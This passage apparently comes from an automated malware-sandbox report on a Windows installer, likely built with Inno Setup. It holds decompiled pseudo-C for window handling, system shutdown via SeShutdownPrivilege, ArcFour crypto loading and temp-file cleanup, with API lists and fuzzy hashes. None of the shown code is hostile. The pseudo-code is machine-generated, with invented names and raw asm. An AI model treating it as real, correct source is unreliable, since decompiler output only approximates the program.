								_t186 =  *0x49a628; // 0x2262410
								_t225 = E004146E8( *((intOrPtr*)(_t186 + 0x28))) -  *(_v8 + 0x30);
								_t223 = _t225 >> 1;
								if(_t225 < 0) {
									asm("adc esi, 0x0");
								}
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							if(_t223 < 0) {
								_t223 = 0;
							}
							 *((intOrPtr*)( *_v8 + 0x4c))( *(_v8 + 0x30),  *(_v8 + 0x2c));
						}
						 *((char*)(_v8 + 0x117)) = 0;
						if( *((char*)(_v8 + 0x116)) != 1) {
							ShowWindow(E004181C8(_v8),  *(0x4985d8 + ( *(_v8 + 0x112) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x112) != 2) {
								ShowWindow(E004181C8(_v8),  *(0x4985d8 + ( *(_v8 + 0x112) & 0x000000ff) * 4));
								_t150 =  *(_v8 + 0x30) << 0x00000010 |  *(_v8 + 0x2c);
								__eflags = _t150;
								CallWindowProcA(0x405e14, E004181C8(_v8), 5, 0, _t150);
								E00414CAC(_v8);
							} else {
								_t161 = E004181C8(_v8);
								_t162 =  *0x49a628; // 0x2262410
								SendMessageA( *( *((intOrPtr*)(_t162 + 0x28)) + 0x130), 0x223, _t161, 0);
								ShowWindow(E004181C8(_v8), 3);
							}
							_t156 =  *0x49a628; // 0x2262410
							SendMessageA( *( *((intOrPtr*)(_t156 + 0x28)) + 0x130), 0x234, 0, 0);
						}
					}
				}
				_pop(_t211);
				 *[fs:eax] = _t211;
				_push(0x422bad);
				_t94 = _v8;
				 *(_t94 + 0x119) =  *(_t94 + 0x119) & 0x000000fb;
				return _t94;
			}

0x00422845
0x00422847
0x00422848
0x00422849
0x0042284a
0x0042284b
0x00422855
0x0042286f
0x00422874
0x00422874
0x0042287c
0x00422885
0x00422886
0x0042288b
0x0042288e
0x00422898
0x0042289e
0x004228a1
0x004228a8
0x00422a94
0x00422a9e
0x00422aa5
0x00422aa7
0x00422aa8
0x00422ac4
0x00422acc
0x00422acf
0x00422ad1
0x00422ad6
0x00422ad6
0x00422adb
0x00422ade
0x00422ae5
0x00422af4
0x00422af7
0x00422afe
0x00422b1f
0x00422b24
0x00422b2b
0x00422b30
0x00422b32
0x00422b3d
0x00422b42
0x00422b44
0x00422b53
0x00422b53
0x00422b44
0x00422b55
0x00422b57
0x00422b89
0x00422b59
0x00422b71
0x00422b77
0x00422b77
0x00422b00
0x00422b18
0x00422b18
0x00422ae7
0x00422aea
0x00422aea
0x004228ae
0x004228b9
0x004228c3
0x004228ca
0x004228cd
0x004228f3
0x00422903
0x0042294e
0x0042294e
0x00422951
0x00422953
0x00422955
0x00422955
0x00422967
0x00422967
0x0042296a
0x0042296c
0x0042296e
0x0042296e
0x00422905
0x00422905
0x00422917
0x0042291a
0x0042291c
0x0042291e
0x0042291e
0x00422921
0x00422933
0x00422936
0x00422938
0x0042293a
0x0042293a
0x00422938
0x00422973
0x00422975
0x00422975
0x00422979
0x0042297b
0x0042297b
0x00422994
0x00422994
0x0042299a
0x004229ab
0x00422a7f
0x004229b1
0x004229bb
0x00422a0e
0x00422a1f
0x00422a1f
0x00422a35
0x00422a3d
0x004229bd
0x004229c2
0x004229cd
0x004229dc
0x004229ec
0x004229ec
0x00422a4b
0x00422a5a
0x00422a5a
0x004229ab
0x004228a8
0x00422b90
0x00422b93
0x00422b96
0x00422b9b
0x00422b9e
0x00422ba5

APIs

SendMessageA.USER32 ref: 004229DC
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BA6), ref: 004229EC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: a69509ad4a6f644700087480a736bf11804bd191ccec533882ab50c29f9a819f
Instruction ID: fc67541ccd5e3f21e0a5e7c2d8678ac64681ee96f0cd53918d0111b08ac536aa
Opcode Fuzzy Hash: a69509ad4a6f644700087480a736bf11804bd191ccec533882ab50c29f9a819f
Instruction Fuzzy Hash: 2491A371B00214FFD710EFA9DA86F9D77F4AB14314F5500BAF904AB2A2C778AE509B48

Uniqueness

Uniqueness Score: -1.00%

Function 0041836C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041836C(void* __eax) {
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				intOrPtr _t33;
				void* _t43;
				struct HWND__* _t49;
				struct tagPOINT* _t51;

				_t51 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0xc0)) == 0) {
					GetWindowRect( *(_t43 + 0xc0), _t51);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0xc0),  &_v56);
					memcpy(_t51,  &(_v56.rcNormalPosition), 4 << 2);
					_t51 = _t51 + 0xc;
				}
				if((GetWindowLongA( *(_t43 + 0xc0), 0xfffffff0) & 0x40000000) != 0) {
					_t49 = GetWindowLongA( *(_t43 + 0xc0), 0xfffffff8);
					ScreenToClient(_t49, _t51);
					ScreenToClient(_t49,  &_v64);
				}
				 *(_t43 + 0x24) = _t51->x;
				 *((intOrPtr*)(_t43 + 0x28)) = _v68;
				 *((intOrPtr*)(_t43 + 0x2c)) = _v64.x - _t51->x;
				_t33 = _v64.y.x - _v68;
				 *((intOrPtr*)(_t43 + 0x30)) = _t33;
				return _t33;
			}

0x0041836f
0x00418372
0x00418382
0x004183b4
0x00418384
0x00418384
0x00418398
0x004183a8
0x004183a8
0x004183a8
0x004183cc
0x004183dc
0x004183e0
0x004183eb
0x004183eb
0x004183f3
0x004183fa
0x00418404
0x0041840b
0x0041840f
0x00418418

APIs

IsIconic.USER32 ref: 0041837B
GetWindowPlacement.USER32(?,0000002C), ref: 00418398
GetWindowRect.USER32 ref: 004183B4
GetWindowLongA.USER32 ref: 004183C2
GetWindowLongA.USER32 ref: 004183D7
ScreenToClient.USER32 ref: 004183E0
ScreenToClient.USER32 ref: 004183EB

Strings

,, xrefs: 00418384

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: 4f621163f7cce10786236a9b2c87fbc668bc00eae7ed2980a59d20c9595f6243
Instruction ID: 8e00dd0e9fae7d00a70de0a9eb7d06473ca5d3657d946ea25b8c80b3eee2cba3
Opcode Fuzzy Hash: 4f621163f7cce10786236a9b2c87fbc668bc00eae7ed2980a59d20c9595f6243
Instruction Fuzzy Hash: 2F111971505201ABDB00DF69C885F9B77E8AF49314F18067EBD58DB286D739D900CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00454800 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00454800() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				signed int _t6;

				if( *0x4980dc != 2) {
					L5:
					_t6 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return  ~( ~_t6);
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x0045480a
0x00454867
0x0045486b
0x00454872
0x00000000
0x00454874
0x0045481c
0x0045482e
0x00454833
0x0045483b
0x00454855
0x00454861
0x00000000
0x00000000
0x00000000
0x00454863
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0045480F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454815
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0045482E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454855
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045485A
ExitWindowsEx.USER32 ref: 0045486B

Strings

SeShutdownPrivilege, xrefs: 00454827

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 9f12b05955e9865352e5e16aac1b91cca1ef6bf1783eb5784e2c129517685510
Instruction ID: d22182a0dc1ba8f0c6642c383eecb50a1605a48a6cde18e86443e4a87f87f347
Opcode Fuzzy Hash: 9f12b05955e9865352e5e16aac1b91cca1ef6bf1783eb5784e2c129517685510
Instruction Fuzzy Hash: 96F0C234284742B5E610BA728C03F2B21C89B84B4DF40483ABE04EE1C3D7BDC48C8A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0045C524 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0045C524(struct HINSTANCE__* __eax) {
				struct HINSTANCE__* _t11;
				intOrPtr _t17;

				_t11 = __eax;
				 *0x49b01c = GetProcAddress(__eax, "ISCryptGetVersion");
				 *0x49b020 = GetProcAddress(_t11, "ArcFourInit");
				 *0x49b024 = GetProcAddress(_t11, "ArcFourCrypt");
				if( *0x49b01c == 0 ||  *0x49b020 == 0) {
					L4:
					 *0x49b01c = 0;
					 *0x49b020 = 0;
					 *0x49b024 = 0;
					return 0;
				} else {
					_t17 =  *0x49b024;
					if(_t17 == 0) {
						goto L4;
					} else {
						return  *0x49b01c() - 0x00000001 & 0xffffff00 | _t17 == 0x00000000;
					}
				}
			}

0x0045c525
0x0045c532
0x0045c542
0x0045c552
0x0045c55e
0x0045c57e
0x0045c582
0x0045c58a
0x0045c592
0x0045c599
0x0045c569
0x0045c569
0x0045c570
0x00000000
0x0045c572
0x0045c57d
0x0045c57d
0x0045c570

APIs

GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C52D
GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C53D
GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C54D
ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DB8B,00000000,0047DBB4), ref: 0045C572

Strings

ArcFourCrypt, xrefs: 0045C547
ArcFourInit, xrefs: 0045C537
ISCryptGetVersion, xrefs: 0045C527

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$CryptVersion
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 1951258720-508647305
Opcode ID: a56dc9a75a649bc82389aaa1cf2e500f9ee0c9f17d265c5af5864304c513d135
Instruction ID: dd669f08646f4d69055b3ac0f2dc47e0ccf369d631a00cc3a74d6f6c0e75ef3e
Opcode Fuzzy Hash: a56dc9a75a649bc82389aaa1cf2e500f9ee0c9f17d265c5af5864304c513d135
Instruction Fuzzy Hash: 57F049B0900714EFDB28DFB2BEC47233AD5E398706F04C03BA814992A6E7785448DE9C

Uniqueness

Uniqueness Score: -1.00%

Function 004963A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004963A0(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v8;
				char _v12;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				void* _t61;
				intOrPtr _t73;
				intOrPtr _t75;
				signed int _t80;
				void* _t83;
				void* _t84;
				intOrPtr _t85;

				_t83 = _t84;
				_t85 = _t84 + 0xfffffeb4;
				_v336 = 0;
				_v12 = 0;
				_t61 = __eax;
				_push(_t83);
				_push(0x4964de);
				_push( *[fs:eax]);
				 *[fs:eax] = _t85;
				E00403494( &_v336, __eax);
				E0040357C( &_v336, "isRS-???.tmp");
				_v8 = FindFirstFileA(E00403738(_v336),  &_v332);
				if(_v8 == 0xffffffff) {
					_pop(_t73);
					 *[fs:eax] = _t73;
					_push(E004964E5);
					E00403400( &_v336);
					return E00403400( &_v12);
				} else {
					_push(_t83);
					_push(0x4964b6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t85;
					do {
						if(E00407438( &(_v332.cFileName), 5, "isRS-") == 0 && (_v332.dwFileAttributes & 0x00000010) == 0) {
							E0040355C( &_v336, 0x104,  &(_v332.cFileName));
							E004035C0( &_v12, _v336, _t61);
							_t80 = _v332.dwFileAttributes;
							if((_t80 & 0x00000001) != 0) {
								SetFileAttributesA(E00403738(_v12), _t80 & 0xfffffffe);
							}
							E00406F30(_v12);
						}
					} while (FindNextFileA(_v8,  &_v332) != 0);
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E004964BD);
					return FindClose(_v8);
				}
			}

0x004963a1
0x004963a3
0x004963ae
0x004963b4
0x004963b7
0x004963bb
0x004963bc
0x004963c1
0x004963c4
0x004963d6
0x004963e6
0x004963fc
0x00496403
0x004964bf
0x004964c2
0x004964c5
0x004964d0
0x004964dd
0x00496409
0x0049640b
0x0049640c
0x00496411
0x00496414
0x00496417
0x0049642e
0x0049644a
0x0049645a
0x0049645f
0x0049646b
0x0049647a
0x0049647a
0x00496482
0x00496482
0x00496497
0x004964a1
0x004964a4
0x004964a7
0x004964b5
0x004964b5

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004964DE,?,?,00000000,0049A628,?,00496668,00000000,004966BC,?,?,00000000,0049A628), ref: 004963F7
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049647A
FindNextFileA.KERNEL32(000000FF,?,00000000,004964B6,?,00000000,?,00000000,004964DE,?,?,00000000,0049A628,?,00496668,00000000), ref: 00496492
FindClose.KERNEL32(000000FF,004964BD,004964B6,?,00000000,?,00000000,004964DE,?,?,00000000,0049A628,?,00496668,00000000,004966BC), ref: 004964B0

Strings

isRS-, xrefs: 00496417
isRS-???.tmp, xrefs: 004963E1

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 5b9b3f916384c03824f76294428fa88423c184b692a85cbb7c080327146318d0
Instruction ID: daa5b125c80c46eb5aeb9150060b7ac6d6724199db2123f663f7f6175ded04fd
Opcode Fuzzy Hash: 5b9b3f916384c03824f76294428fa88423c184b692a85cbb7c080327146318d0
Instruction Fuzzy Hash: 7431A671900618AFDF10EFA5CC51ADEBBBCDB45304F5184FBA808A32A1DB3C9E458E58

Uniqueness

Uniqueness Score: -1.00%

Function 004563D8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241
windownativeCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004563D8(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				char _v12;
				char _v16;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v164;
				char _v168;
				void* _t57;
				intOrPtr* _t59;
				signed int _t75;
				intOrPtr _t80;
				void* _t107;
				void* _t110;
				intOrPtr _t111;
				intOrPtr _t122;
				intOrPtr _t125;
				signed int _t156;
				intOrPtr _t162;
				signed int _t163;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t172;
				signed int _t175;
				intOrPtr _t179;
				intOrPtr _t184;
				void* _t189;
				void* _t190;
				intOrPtr _t191;
				void* _t197;

				_t197 = __fp0;
				_t187 = __esi;
				_t186 = __edi;
				_t189 = _t190;
				_t191 = _t190 + 0xffffff5c;
				_push(__esi);
				_push(__edi);
				_v168 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = __edx;
				_push(_t189);
				_push(0x4567a3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				_push(_t189);
				_push(0x456767);
				_push( *[fs:edx]);
				 *[fs:edx] = _t191;
				_t125 =  *_v8;
				_t57 = _t125 - 0x4a;
				if(_t57 == 0) {
					_t59 =  *((intOrPtr*)(_v8 + 8));
					_t156 =  *_t59 - 0x800;
					__eflags = _t156;
					if(_t156 == 0) {
						_push(_t189);
						_push(0x456588);
						_push( *[fs:edx]);
						 *[fs:edx] = _t191;
						__eflags =  *(_t59 + 4);
						E004034E0( &_v12,  *(_t59 + 4) >> 0,  *((intOrPtr*)(_t59 + 8)),  *(_t59 + 4));
						_push(_t189);
						_push(0x456546);
						_push( *[fs:eax]);
						 *[fs:eax] = _t191;
						 *0x49b3ac = 1;
						_push(_t189);
						_push(0x45652b);
						_push( *[fs:eax]);
						 *[fs:eax] = _t191;
						E0047AA00(_v12,  *(_t59 + 4) >> 0,  &_v16);
						__eflags = 0;
						_pop(_t162);
						 *[fs:eax] = _t162;
						_push(E00456532);
						 *0x49b3ac = 0;
						return 0;
					} else {
						_t163 = _t156 - 1;
						__eflags = _t163;
						if(_t163 == 0) {
							_push(_t189);
							_push(0x45667c);
							_push( *[fs:edx]);
							 *[fs:edx] = _t191;
							E00402738( *((intOrPtr*)(_t59 + 8)), 0x94,  &_v164);
							_push(_t189);
							_push(0x45663a);
							_push( *[fs:eax]);
							 *[fs:eax] = _t191;
							__eflags =  *0x49b3b8;
							if( *0x49b3b8 == 0) {
								E00408BEC("Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E0040311C();
							}
							E0040355C( &_v168, 0x80,  &_v144);
							_t75 =  *0x49b3b8; // 0x22901cc
							E00493284(_t75, _t125, _v152, _v156, _t186, _t187, _t197,  &_v16, _v168, _v148);
							 *((intOrPtr*)(_v8 + 0xc)) = 1;
							_pop(_t168);
							 *[fs:eax] = _t168;
							_t169 =  *0x49afbc; // 0x0
							_t80 =  *0x49afb8; // 0x0
							E00430F30(_t80, _t125, 0x700, _t169, _t186, _t187, _v16);
							_pop(_t170);
							 *[fs:eax] = _t170;
						} else {
							_t175 = _t163 - 1;
							__eflags = _t175;
							if(_t175 == 0) {
								_push(_t189);
								_push(0x4566d8);
								_push( *[fs:edx]);
								 *[fs:edx] = _t191;
								E00403400(0x49afb0);
								__eflags =  *( *((intOrPtr*)(_v8 + 8)) + 4);
								E004034E0(0x49afb0,  *( *((intOrPtr*)(_v8 + 8)) + 4) >> 0,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)),  *( *((intOrPtr*)(_v8 + 8)) + 4));
								 *((intOrPtr*)(_v8 + 0xc)) = 1;
								_pop(_t179);
								 *[fs:eax] = _t179;
							} else {
								__eflags = _t175 == 1;
								if(_t175 == 1) {
									_push(_t189);
									_push(0x45672e);
									_push( *[fs:edx]);
									 *[fs:edx] = _t191;
									E00403400(0x49afb4);
									__eflags =  *( *((intOrPtr*)(_v8 + 8)) + 4);
									E004034E0(0x49afb4,  *( *((intOrPtr*)(_v8 + 8)) + 4) >> 0,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + 8)),  *( *((intOrPtr*)(_v8 + 8)) + 4));
									 *((intOrPtr*)(_v8 + 0xc)) = 1;
									_pop(_t184);
									 *[fs:eax] = _t184;
								}
							}
						}
						goto L21;
					}
				} else {
					_t107 = _t57 - 0xbb6;
					if(_t107 == 0) {
						 *0x49afac = 0;
						 *0x49afb8 = 0;
						 *0x49afc0 = 1;
						 *0x49afc1 = 0;
						PostMessageA(0, 0, 0, 0);
					} else {
						_t110 = _t107 - 1;
						if(_t110 == 0) {
							 *0x49afc0 = 1;
							_t111 = _v8;
							__eflags =  *((intOrPtr*)(_t111 + 4)) - 1;
							 *0x49afc1 =  *((intOrPtr*)(_t111 + 4)) == 1;
							PostMessageA(0, 0, 0, 0);
						} else {
							if(_t110 == 2) {
								SetForegroundWindow( *(_v8 + 4));
							} else {
								_push( *((intOrPtr*)(_v8 + 8)));
								_push( *(_v8 + 4));
								_push(_t125);
								_t122 =  *0x49afbc; // 0x0
								_push(_t122);
								L00405E1C();
								 *((intOrPtr*)(_v8 + 0xc)) = _t122;
							}
						}
					}
					L21:
					_pop(_t171);
					 *[fs:eax] = _t171;
					_pop(_t172);
					 *[fs:eax] = _t172;
					_push(E004567AA);
					E00403400( &_v168);
					return E00403420( &_v16, 2);
				}
			}

0x004563d8
0x004563d8
0x004563d8
0x004563d9
0x004563db
0x004563e2
0x004563e3
0x004563e6
0x004563ec
0x004563ef
0x004563f2
0x004563f7
0x004563f8
0x004563fd
0x00456400
0x00456405
0x00456406
0x0045640b
0x0045640e
0x00456414
0x00456418
0x0045641b
0x0045649a
0x0045649f
0x0045649f
0x004564a5
0x004564c3
0x004564c4
0x004564c9
0x004564cc
0x004564d5
0x004564e3
0x004564ea
0x004564eb
0x004564f0
0x004564f3
0x004564f6
0x004564ff
0x00456500
0x00456505
0x00456508
0x00456511
0x00456516
0x00456518
0x0045651b
0x0045651e
0x00456523
0x0045652a
0x004564a7
0x004564a7
0x004564a7
0x004564a8
0x00456599
0x0045659a
0x0045659f
0x004565a2
0x004565b6
0x004565bd
0x004565be
0x004565c3
0x004565c6
0x004565c9
0x004565d0
0x004565de
0x004565e3
0x004565e3
0x00456600
0x0045661c
0x00456621
0x00456629
0x00456632
0x00456635
0x0045665f
0x00456665
0x0045666a
0x00456671
0x00456674
0x004564ae
0x004564ae
0x004564ae
0x004564af
0x0045668d
0x0045668e
0x00456693
0x00456696
0x0045669e
0x004566ac
0x004566bc
0x004566c4
0x004566cd
0x004566d0
0x004564b5
0x004564b5
0x004564b6
0x004566e6
0x004566e7
0x004566ec
0x004566ef
0x004566f7
0x00456705
0x00456715
0x0045671d
0x00456726
0x00456729
0x00456729
0x004564b6
0x004564af
0x00000000
0x004564a8
0x0045641d
0x0045641d
0x00456422
0x00456431
0x0045643a
0x0045643f
0x00456446
0x00456455
0x00456424
0x00456424
0x00456425
0x0045645f
0x00456466
0x00456469
0x0045646d
0x0045647c
0x00456427
0x0045642a
0x0045648d
0x0045642c
0x00456740
0x00456747
0x0045674b
0x0045674c
0x00456751
0x00456752
0x0045675a
0x0045675a
0x0045642a
0x00456425
0x0045675d
0x0045675f
0x00456762
0x0045677f
0x00456782
0x00456785
0x00456790
0x004567a2
0x004567a2

APIs

PostMessageA.USER32 ref: 00456455
PostMessageA.USER32 ref: 0045647C
SetForegroundWindow.USER32(?,00000000,00456767,?,00000000,004567A3), ref: 0045648D
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456767,?,00000000,004567A3), ref: 00456752

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 004565D2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: 463a1999979874763b4afaa1d19d2caecc759e2aa3a2d58d7ec4b408ad99c9f4
Instruction ID: cd98618036c15ebced57857b8283fe4cd0e8cc10ae145455f7924607e19dc4d8
Opcode Fuzzy Hash: 463a1999979874763b4afaa1d19d2caecc759e2aa3a2d58d7ec4b408ad99c9f4
Instruction Fuzzy Hash: 2B910034204204EFD715CF65D961F5ABBF9EB89304F6280BAEC0897796C738AE14CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00455028 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00455028(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v6;
				char _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				signed int _t61;
				signed int _t78;
				intOrPtr* _t86;
				intOrPtr _t99;
				intOrPtr _t105;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xffffffdc;
				_v36 = 0;
				_v40 = 0;
				_t108 = __ecx;
				_t110 = __edx;
				_v5 = __eax;
				_push(_t112);
				_push(0x45515c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				_t86 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetDiskFreeSpaceExA");
				if(E00451A84(_v5,  &_v16) != 0) {
					_push(_t112);
					_push(0x45513a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t114;
					if(_t86 == 0) {
						E0042C7A8(_t110,  &_v36);
						E0042C870(_v36,  &_v40);
						E0042C3E4(_v40,  &_v36);
						_t61 = GetDiskFreeSpaceA(E00403738(_v36),  &_v20,  &_v24,  &_v28,  &_v32);
						asm("sbb eax, eax");
						_v6 =  ~( ~_t61);
						if(_v6 != 0) {
							E00430834(_v24 * _v20, _t108, _v28);
							E00430834(_v24 * _v20, _a4, _v32);
						}
					} else {
						E0042C3E4(_t110,  &_v36);
						_t78 =  *_t86(E00403738(_v36), _t108, _a4, 0);
						asm("sbb eax, eax");
						_v6 =  ~( ~_t78);
					}
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(0x455141);
					return E00451AC0( &_v16);
				} else {
					_v6 = 0;
					_pop(_t105);
					 *[fs:eax] = _t105;
					_push(0x455163);
					return E00403420( &_v40, 2);
				}
			}

0x00455029
0x0045502b
0x00455033
0x00455036
0x00455039
0x0045503b
0x0045503d
0x00455042
0x00455043
0x00455048
0x0045504b
0x00455063
0x00455072
0x0045507f
0x00455080
0x00455085
0x00455088
0x0045508d
0x004550cb
0x004550d6
0x004550e1
0x004550ef
0x004550f6
0x004550fa
0x00455101
0x0045510e
0x0045511f
0x0045511f
0x0045508f
0x0045509b
0x004550a9
0x004550ad
0x004550b1
0x004550b1
0x00455126
0x00455129
0x0045512c
0x00455139
0x00455074
0x00455074
0x00455143
0x00455146
0x00455149
0x0045515b
